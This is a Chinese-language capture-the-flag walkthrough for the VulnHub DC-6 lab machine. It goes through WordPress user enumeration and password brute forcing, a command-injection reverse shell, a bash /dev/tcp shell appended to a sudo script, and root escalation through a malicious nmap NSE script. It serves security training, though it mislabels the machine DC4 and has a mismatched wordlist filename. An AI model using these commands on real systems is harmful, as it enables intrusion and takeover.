一.靶机下载
官方链接:
https://download.vulnhub.com/dc/DC-6.zip
网盘链接:
https://pan.baidu.com/s/1kA-N2MptaIrB3OBWuxjPSg 提取码: x9d6
导入之后要在设置中将其调为NAT模式
默认情况我们是不知道靶机的密码的,目的是通过kali获取靶机中的flag信息
二.靶机信息收集
因为靶机与kali处于同一网络状态下,使用命令:arp-scan -l得到靶机的ip为:192.168.194.138
使用命令:nmap -A 192.168.194.138对靶机进行扫描
发现靶机开放了80端口,尝试对80端口进行访问
发现访问失败,url被解析成了 http:wordy,需要添加host记录
使用命令:
echo "192.168.194.138 wordy" >> /etc/hosts
我们扫描一下他的目录
使用命令:dirb http://wordy
扫描发现后台,进行访问
一眼发现这是WordPress,我们采用专门针对wordpress的工具wpscan来进行用户枚举
使用命令:wpscan --url http://wordy/ -e u
使用命令:
echo -e "admin\mark\graham\sarah\jens" > users.txt
三.爆破
进行爆破一下,使用kali中的密码本,因为这个密码本太长了去DC6的下载页面寻找线索
使用命令:
grep -a '01$' /usr/share/wordlists/rockyou.txt > /home/kali/Desktop/pass.txt
rockyou.txt 就自行去下载
使用命令:
wpscan --url http://wordy/ -U /home/kali/Desktop/users.txt -P /home/kali/Desktop/passwords.txt
使用账号密码成功登录
逐个查看功能点,发现一处可以注入的地方
成功命令执行,所以来接着来反弹shell
使用命令:
nc -lvvp 1111
127.0.0.1|nc -e /bin/bash 192.168.194.134 1111
切换为交互式shell
使用命令:
python -c "import pty; pty.spawn('/bin/bash');"
切换到home目录寻找有用信息
使用命令:
cd /home
ls
cd mark
ls
cd stuff
ls
cd things-to-do.txt
发现泄露graham的密码GSo7isUM1D4,直接切换graham用户
使用命令
su - graham
查看graham的权限
使用命令:sudo -l
可以 jens 身份无密码执行/home/jens/backups.sh,接着追加反弹shell到backups.sh
使用命令:
nc -lvvp 2222
echo 'bash -i >& /dev/tcp/192.168.194.134/2222 0>&1' >> /home/jens/backups.sh
sudo-u jens /home/jens/backups.sh
使用命令:
sudo -l
具有root权限,可以运行nmap
创建恶意 NSE 脚本
使用命令:
echo 'os.execute("/bin/sh")' > /tmp/root.nse
sudo 调用 nmap 加载脚本,直接 root shell
使用命令:
sudo nmap --script=/tmp/root.nse
成功获取 root 权限,读取最终 flag
使用命令:
cat /root/theflag.txt
成功获取最后的flag!
如有错误请大佬们指正!
到这里我们也是成功通关了DC4靶机,后续会接着更新DC系列的靶机通关教程,请多多关注一下!